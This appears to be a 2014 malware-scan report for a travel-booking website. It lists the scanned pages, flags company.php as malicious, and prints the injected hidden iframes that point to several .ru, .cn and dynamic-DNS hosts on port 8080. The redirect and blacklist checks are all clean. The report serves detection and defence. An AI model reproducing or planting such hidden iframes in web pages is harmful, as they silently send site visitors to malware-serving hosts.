Scanned pages/files
| Request | Server response | Status |
http://travelfreeco.com/ | 200 OK Content-Length: 3985 Content-Type: text/html | clean |
http://travelfreeco.com/index2.htm | 200 OK Content-Length: 647 Content-Type: text/html | clean |
http://travelfreeco.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://travelfreeco.com/indexa.htm | 200 OK Content-Length: 579 Content-Type: text/html | clean |
http://travelfreeco.com/online/index.php | 200 OK Content-Length: 5362 Content-Type: text/html | clean |
http://travelfreeco.com/online/hotelbk.php | 200 OK Content-Length: 15331 Content-Type: text/html | clean |
http://travelfreeco.com/online/js/CalendarPopup.js | 200 OK Content-Length: 58610 Content-Type: application/javascript | clean |
http://travelfreeco.com/online/ | 200 OK Content-Length: 5362 Content-Type: text/html | clean |
http://travelfreeco.com/online/ticket.php | 200 OK Content-Length: 12148 Content-Type: text/html | clean |
http://travelfreeco.com/online/check.php | 200 OK Content-Length: 6253 Content-Type: text/html | clean |
http://travelfreeco.com/online/company.php | 200 OK Content-Length: 7553 Content-Type: text/html | malicious |
Page code contains blacklisted domain: sexsila.ru ...[3556 bytes skipped]... dth=125 height=125 style="vis <iframe src="http://3e0.ru:8080/index.php" width=110 height=102 style="vi <iframe src="http://greatbetpoker.cn:8080/index.php" width=121 height=113 style="v <iframe src="http://onniru.homelinux.org:8080/ts/in.cgi?open5" width=663 height=0 style=" <iframe src="http://foskant.dontexist.org/index.php" width=184 height=113 style= <div style="display:none"><iframe src="http://sexsila.ru:8080/index.php" width= <div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width <div style="display:none"><iframe src="http://previous-life.ru:8080/index.php" widt <div style="display:none"><iframe src="http://inother.ru:8080/index.php" wid <div style="display:none"><iframe src="http://biozov.ru:8080/index.php" width=305 height=372 ></iframe></div> < ...[469 bytes skipped]... Malicious iFrame found. style: hidden src: http://previous-life.ru:8080/index.php This URL is marked by Google as suspicious <iframe src="http://previous-life.ru:8080/index.php" widt<div style="display:none"> Hidden iFrame found. style: hidden src: http://theanotherlife.ru:8080/index.php <iframe src="http://theanotherlife.ru:8080/index.php" width<div style="display:none"> Hidden iFrame found. style: hidden src: http://inother.ru:8080/index.php <iframe src="http://inother.ru:8080/index.php" wid<div style="display:none"> Hidden iFrame found. size: 125x125 style: hidden src: http://ce5.at:8080/ts/in.cgi?pepsi149 <iframe src="http://ce5.at:8080/ts/in.cgi?pepsi149" width=125 height=125 style="vis<iframe src="http://3e0.ru:8080/index.php" width=110 height=102 style="vi<iframe src="http://greatbetpoker.cn:8080/index.php" width=121 height=113 style="v<iframe src="http://onniru.homelinux.org:8080/ts/in.cgi?open5" width=663 height=0 style="<iframe src="http://foskant.dontexist.org/index.php" width=184 height=113 style=<div style="display:none"> Malicious iFrame found. style: hidden src: http://sexsila.ru:8080/index.php This URL is marked by Google as suspicious <iframe src="http://sexsila.ru:8080/index.php" width=<div style="display:none"> | ||
http://travelfreeco.com/online/vip.php | 200 OK Content-Length: 5631 Content-Type: text/html | clean |
http://travelfreeco.com/online/login.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://travelfreeco.com/main.htm | 200 OK Content-Length: 4675 Content-Type: text/html | clean |
http://travelfreeco.com/online/intro.php | 200 OK Content-Length: 7873 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: travelfreeco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 18:03:44 GMT
Accept-Ranges: bytes
ETag: "1a38153-f91-4789be7704040"
Server: Apache/2.2.15 (Unix) DAV/2 PHP/5.2.17
Content-Length: 3985
Content-Type: text/html
Last-Modified: Wed, 18 Nov 2009 02:21:45 GMT
...3985 bytes of data.
GET / HTTP/1.1
Host: travelfreeco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 18:03:44 GMT
Accept-Ranges: bytes
ETag: "1a38153-f91-4789be7704040"
Server: Apache/2.2.15 (Unix) DAV/2 PHP/5.2.17
Content-Length: 3985
Content-Type: text/html
Last-Modified: Wed, 18 Nov 2009 02:21:45 GMT
...3985 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: travelfreeco.com
Referer: http://www.google.com/search?q=travelfreeco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: travelfreeco.com
Referer: http://www.google.com/search?q=travelfreeco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=travelfreeco.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://travelfreeco.com/
Result: travelfreeco.com is not infected or malware details are not published yet.
Result: travelfreeco.com is not infected or malware details are not published yet.